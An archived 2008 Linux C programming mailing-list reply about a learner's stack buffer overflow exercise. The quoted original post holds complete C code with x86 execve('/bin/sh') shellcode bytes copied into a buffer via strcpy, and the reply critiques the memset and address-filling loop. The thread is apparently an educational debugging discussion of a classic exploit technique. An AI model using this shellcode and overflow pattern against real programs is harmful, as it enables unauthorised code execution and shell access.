From: Varun Chandramohan <varunc@linux.vnet.ibm.com>
To: vincent-perrier <vincent-perrier@club-internet.fr>
Cc: linux-c-programming@vger.kernel.org
Subject: Re: buffer overflow
Date: Wed, 12 Mar 2008 09:59:38 +0530 [thread overview]
Message-ID: <47D75C32.5030508@linux.vnet.ibm.com> (raw)
In-Reply-To: <1205260349.5098.18.camel@localhost>
vincent-perrier wrote:
> This is bad:
> memset(&buffer,0,sizeof(buffer));
> buffer is already the address of the space:
> memset(buffer,0,...); is what I would do
>
>
fine.
> This is bad too:
> for (i = 0; i < 32; i++)
> *(long_ptr + i) = (long)&buffer;
>
> and most certainly does not do what you want.
>
>
can you suggest something better to achieve this?
> On Tue, 2008-03-11 at 11:38 +0530, Varun Chandramohan wrote:
>
>> Hi all,
>>
>> Can someone tell me whats is wrong with this program? All i
>> get is seg fault. Iam trying to create a stack overflow and exec a
>> shell. Somehow its not working. The system is x86 on linux.
>> gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52)
>> Copyright (C) 2006 Free Software Foundation, Inc.
>> This is free software; see the source for copying conditions. There is NO
>> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
>>
>>
>>
>> The Code:
>> #include <stdio.h>
>> #include <string.h>
>>
>> char shellcode[] =
>> "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
>> "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>> "\x80\xe8\xdc\xff\xff\xff/bin/sh";
>> #if 0
>> char shellcode[] =
>> "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
>> "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
>> "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
>> "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
>>
>> #endif
>>
>> char large_string[128];
>> int main() {
>> char buffer[96];
>> int i;
>> long *long_ptr = (long *) large_string;
>> memset(&buffer,0,sizeof(buffer));
>>
>> for (i = 0; i < 32; i++)
>> *(long_ptr + i) = (long)&buffer;
>>
>> for (i = 0; i < strlen(shellcode); i++)
>> large_string[i] = shellcode[i];
>>
>> strcpy(buffer,large_string);
>> }
>>
>> --
>> To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
>> the body of a message to majordomo@vger.kernel.org
>> More majordomo info at http://vger.kernel.org/majordomo-info.html
>> �
>>
>>
>
>
next prev parent reply other threads:[~2008-03-12 4:29 UTC|newest]
Thread overview: 11+ messages / expand[flat|nested] mbox.gz Atom feed top
2008-03-11 6:08 buffer overflow Varun Chandramohan
2008-03-11 8:33 ` Patrik Båt, RTL
2008-03-11 10:04 ` Patrik Båt, RTL
2008-03-11 10:41 ` Varun Chandramohan
2008-03-11 12:04 ` Patrik Båt, RTL
2008-03-11 12:12 ` ninjaboy
2008-03-11 13:24 ` Varun Chandramohan
[not found] ` <17f2441a0803110649n662264cdp5a4e20361145eac7@mail.gmail.com>
2008-03-12 4:28 ` Varun Chandramohan
2008-03-11 18:32 ` vincent-perrier
2008-03-12 4:29 ` Varun Chandramohan [this message]
-- strict thread matches above, loose matches on Subject: below --
2008-03-17 8:28 nai.xia
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=47D75C32.5030508@linux.vnet.ibm.com \
--to=varunc@linux.vnet.ibm.com \
--cc=linux-c-programming@vger.kernel.org \
--cc=vincent-perrier@club-internet.fr \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.